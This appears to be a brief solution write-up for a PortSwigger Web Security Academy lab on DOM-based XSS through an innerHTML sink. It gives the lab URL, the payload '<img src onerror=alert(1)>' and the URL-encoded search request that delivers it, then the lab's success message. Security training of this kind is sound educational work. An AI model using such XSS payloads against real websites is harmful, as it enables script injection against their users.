Skip to content

Port Swigger DOM XSS in innerHTML sink using sourc

DOM XSS in innerHTML sink using source

Solution

Open website: https://0a4d004504b4e97b80913a2c002b0086.web-security-academy.net/

https://0a4d004504b4e97b80913a2c002b0086.web-security-academy.net/

Create payload

Payload: <img src onerror=alert(1)>
--
GET /?search=%3Cimg+src+onerror%3Dalert%281%29%3E HTTP/2

Solved

Congratulations, you solved the lab!